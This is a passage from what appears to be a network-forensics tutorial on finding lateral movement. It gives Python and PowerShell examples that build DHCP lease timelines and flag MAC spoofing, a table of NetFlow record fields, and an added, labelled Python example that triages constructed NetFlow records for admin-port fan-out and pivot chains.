47%)\">return</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">None</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Example usage during IR:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> __name__ </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'__main__'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    DHCP_LOG_DIR </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">r'C:\\Windows\\System32\\dhcp'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span 
class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"[*] Parsing DHCP logs...\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    events </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> parse_dhcp_logs</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">DHCP_LOG_DIR</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"[*] Parsed </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation interpolation\">events</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> DHCP events\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token 
plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ip_timeline </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> build_ip_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"[*] Built timeline for </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation interpolation\">ip_timeline</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> unique IP addresses\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token comment\" 
style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Example: resolve IP seen in NetFlow at a specific time</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    investigation_ip </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'10.10.5.42'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    investigation_time </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">2025</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">11</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">15</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">2</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">47</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">33</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\">  </span><span class=\"token comment\" 
style=\"color:hsl(212, 9%, 47%);font-style:italic\"># From DNS/NetFlow log</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    result </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> resolve_ip_at_time</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ip_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> investigation_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> investigation_time</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> result</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"\\n[+] At </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">investigation_time</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span 
class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">, </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">investigation_ip</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> was held by:\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"    Hostname: </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">result</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'hostname'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 
75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"    MAC:      </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">result</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'mac'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"    Lease:    </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">result</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'lease_start'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation 
interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> → </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">result</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'lease_end'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation\"> </span><span class=\"token string-interpolation interpolation keyword\" style=\"color:hsl(356, 75%, 47%)\">or</span><span class=\"token string-interpolation interpolation\"> </span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'Active'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">else</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" 
style=\"color:hsl(139, 66%, 32%)\">f\"[-] No DHCP record for </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">investigation_ip</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> at </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">investigation_time</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"    Possible: static IP, rogue device, or DHCP logs pre-date the event\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"34-detecting-rogue-devices-and-mac-spoofing-in-dhcp-logs\">3.4 Detecting Rogue Devices and MAC Spoofing in DHCP Logs<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#34-detecting-rogue-devices-and-mac-spoofing-in-dhcp-logs\" class=\"hash-link\" aria-label=\"Direct link to 3.4 Detecting Rogue Devices and MAC Spoofing in DHCP Logs\" title=\"Direct link to 3.4 
Detecting Rogue Devices and MAC Spoofing in DHCP Logs\" translate=\"no\">​</a></h3>\n<p>Attackers commonly bring a rogue device onto the network or clone the MAC address of a trusted one to inherit its DHCP reservation and any MAC-based access control. DHCP logs can surface both, with one limit: only devices that request a lease appear, so a rogue host configured with a static IP leaves no DHCP record at all. The signal to look for is a single MAC address appearing with several different hostnames over time. Treat a hit as a lead rather than proof, because docking stations that present their own MAC for whichever laptop is connected, reimaged machines, and plain hostname changes produce the same pattern legitimately:</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Detect MAC addresses seen with multiple different hostnames (MAC reuse or spoofing)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$dhcpLogDir = \"C:\\Windows\\System32\\dhcp\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$assignEvents = @()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-ChildItem \"$dhcpLogDir\\DhcpSrvLog-*.log\" | ForEach-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Get-Content $_.FullName | Where-Object { $_ -match '^10,' } |  # Event ID 10 = Assign</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ForEach-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $parts = $_ -split ','</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        if ($parts.Count -ge 7 -and $parts[6] 
-ne '') {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            $assignEvents += [PSCustomObject]@{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                Timestamp  = \"$($parts[1]) $($parts[2])\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                IP         = $parts[4]</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                Hostname   = $parts[5]</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                MAC        = $parts[6]</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># MAC with multiple hostnames = suspicious</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$assignEvents |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Group-Object MAC |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Where-Object { ($_.Group.Hostname | Sort-Object -Unique).Count -gt 1 } |</span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ForEach-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $hostnames = ($_.Group.Hostname | Sort-Object -Unique) -join ', '</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Warning \"MAC $($_.Name) seen with multiple hostnames: $hostnames\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $_.Group | Sort-Object Timestamp | Select-Object Timestamp, IP, Hostname, MAC |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            Format-Table -AutoSize</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-4--netflow-analysis-reading-east-west-traffic-without-a-tap\">Part 4  NetFlow Analysis: Reading East-West Traffic Without a Tap<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#part-4--netflow-analysis-reading-east-west-traffic-without-a-tap\" class=\"hash-link\" aria-label=\"Direct link to Part 4  NetFlow Analysis: Reading East-West Traffic Without a Tap\" title=\"Direct link to Part 4  NetFlow Analysis: Reading East-West Traffic Without a Tap\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"41-what-netflow-records-contain\">4.1 What NetFlow Records Contain<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#41-what-netflow-records-contain\" class=\"hash-link\" aria-label=\"Direct link to 4.1 What NetFlow Records Contain\" title=\"Direct link to 4.1 What NetFlow Records Contain\" 
translate=\"no\">​</a></h3>\n<p>NetFlow (Cisco's original protocol) and its successors IPFIX and sFlow record <strong>connection metadata</strong>  not packet content. For each network flow (defined as packets sharing the same 5-tuple: source IP, destination IP, source port, destination port, protocol), NetFlow records:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">NetFlow v9 / IPFIX Record Fields:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">──────────────────────────────────────────────────────────────────</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Field               Type      Forensic Value</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">──────────────────────────────────────────────────────────────────</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">src_addr            IPv4/6    Source IP address</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">dst_addr            IPv4/6    Destination IP address</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">src_port            uint16    Source port (ephemeral for clients)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">dst_port            uint16    Destination port (service 
identifier)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">protocol            uint8     6=TCP, 17=UDP, 1=ICMP</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">flow_start          datetime  When the flow began</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">flow_end            datetime  When the flow ended</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">in_bytes            uint64    Bytes from src to dst</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">out_bytes           uint64    Bytes from dst to src (bidirectional flows)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">tcp_flags           uint8     SYN, ACK, RST, FIN combinations</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">input_snmp          uint32    Router interface index (ingress)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">output_snmp         uint32    Router interface index (egress)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">──────────────────────────────────────────────────────────────────</span><br></span></code></pre></div></div>\n<p>What NetFlow does NOT contain: packet payload, request/response content, authentication details, or process names. It tells you that a connection happened, when, for how long, and how much data moved. 
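Here is an added Python example, not code from the original post, that does the collector-side work described in section 4.3 below over records in nfdump's `fmt:%ts %te %sa %da %dp %pr %byt %flg` layout (printed with -q and -N so that no header lines or scaled numbers appear): it counts distinct targets per source and admin port to expose scanning, lists admin-protocol flows between workstations, and walks completed sessions forward in time from a seed host to bound the blast radius. The flow lines, the workstation subnets 10.10.5.0/24 and 10.10.6.0/24, and the allow-listed print server 10.10.5.250 are constructed for this example.

```python
"""Added example (not from the original post): collector-side triage of
NetFlow records, mirroring the nfdump scenarios in section 4.3. Input is
what nfdump -q -N -o "fmt:%ts %te %sa %da %dp %pr %byt %flg" prints. The
sample flows, subnets and allow-listed server below are constructed."""
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address, ip_network

ADMIN_PORTS = {445: "SMB", 135: "RPC", 3389: "RDP", 5985: "WinRM"}
# Assumed address plan: two workstation VLANs and one print server among them.
WORKSTATION_NETS = [ip_network("10.10.5.0/24"), ip_network("10.10.6.0/24")]
KNOWN_SERVERS = {"10.10.5.250"}  # workstation SMB to this host is expected

# Constructed sample: SMB sweep from 10.10.5.42, RDP hop to 10.10.6.77, then a
# WinRM hop onward. Flags are nfdump's cumulative UAPRSF string.
SAMPLE_FLOWS = """\
2025-11-15 09:01:02.114 2025-11-15 09:01:02.118 10.10.5.42 10.10.5.10 445 TCP 120 ....S.
2025-11-15 09:01:02.120 2025-11-15 09:01:02.121 10.10.5.42 10.10.5.11 445 TCP 120 ....S.
2025-11-15 09:01:02.125 2025-11-15 09:01:02.126 10.10.5.42 10.10.5.12 445 TCP 120 ....S.
2025-11-15 09:01:02.130 2025-11-15 09:01:03.900 10.10.5.42 10.10.5.13 445 TCP 18420 .AP.SF
2025-11-15 09:14:40.001 2025-11-15 09:41:12.550 10.10.5.42 10.10.6.77 3389 TCP 4812233 .AP.SF
2025-11-15 09:20:00.000 2025-11-15 09:20:05.000 10.10.5.42 10.10.0.53 53 UDP 180 ......
2025-11-15 09:30:00.000 2025-11-15 09:30:01.000 10.10.6.77 10.10.5.250 445 TCP 22000 .AP.SF
2025-11-15 09:35:00.000 2025-11-15 09:36:00.000 10.10.6.77 10.10.6.80 5985 TCP 65000 .AP.SF
"""

def parse_flows(text):
    """Parse fmt lines into dicts; %ts and %te are two whitespace fields each."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 10 or not parts[0][:4].isdigit():
            continue  # header or summary line (present if -q was forgotten)
        flows.append({
            "start": datetime.strptime(f"{parts[0]} {parts[1]}", "%Y-%m-%d %H:%M:%S.%f"),
            "end": datetime.strptime(f"{parts[2]} {parts[3]}", "%Y-%m-%d %H:%M:%S.%f"),
            "src": parts[4], "dst": parts[5], "dport": int(parts[6]),
            "proto": parts[7], "bytes": int(parts[8]), "flags": parts[9],
        })
    return flows

def handshake_completed(flow):
    """Records are unidirectional. On the client-side record an ACK can only
    follow the server's SYN-ACK, so 'A' separates real sessions from probes
    that were refused or never answered."""
    return flow["proto"] == "TCP" and "A" in flow["flags"]

def fanout(flows, min_targets=3):
    """Scenario 2: distinct destinations per (source, admin port)."""
    targets = defaultdict(set)
    for f in flows:
        if f["dport"] in ADMIN_PORTS:
            targets[(f["src"], f["dport"])].add(f["dst"])
    return {k: sorted(v) for k, v in targets.items() if len(v) >= min_targets}

def in_workstation_net(ip):
    return any(ip_address(ip) in net for net in WORKSTATION_NETS)

def workstation_to_workstation(flows):
    """Scenarios 3-5: admin-protocol flows between two workstations, minus
    allow-listed servers that happen to sit in a workstation VLAN."""
    return [f for f in flows
            if f["dport"] in ADMIN_PORTS
            and in_workstation_net(f["src"]) and in_workstation_net(f["dst"])
            and f["dst"] not in KNOWN_SERVERS]

def pivot_chain(flows, seed):
    """Walk completed admin sessions forward in time from the seed host. Every
    host reached is treated as possibly compromised, so the result is an upper
    bound; confirm each hop against 4624/4648 logon events on the target."""
    compromised, hops = {seed}, []
    for f in sorted(flows, key=lambda f: f["start"]):
        if f["src"] in compromised and f["dport"] in ADMIN_PORTS and handshake_completed(f):
            hops.append((f["start"], f["src"], f["dst"], ADMIN_PORTS[f["dport"]]))
            compromised.add(f["dst"])
    return hops

if __name__ == "__main__":
    flows = parse_flows(SAMPLE_FLOWS)
    for (src, port), dsts in fanout(flows).items():
        print(f"[!] {src} touched {len(dsts)} hosts on {ADMIN_PORTS[port]}/{port}: {', '.join(dsts)}")
    for f in workstation_to_workstation(flows):
        state = "session" if handshake_completed(f) else "probe"
        print(f"[!] {f['src']} -> {f['dst']} {ADMIN_PORTS[f['dport']]} {state}, {f['bytes']} bytes")
    for start, src, dst, svc in pivot_chain(flows, "10.10.5.42"):
        print(f"    {start:%H:%M:%S} {src} -> {dst} via {svc}")
```

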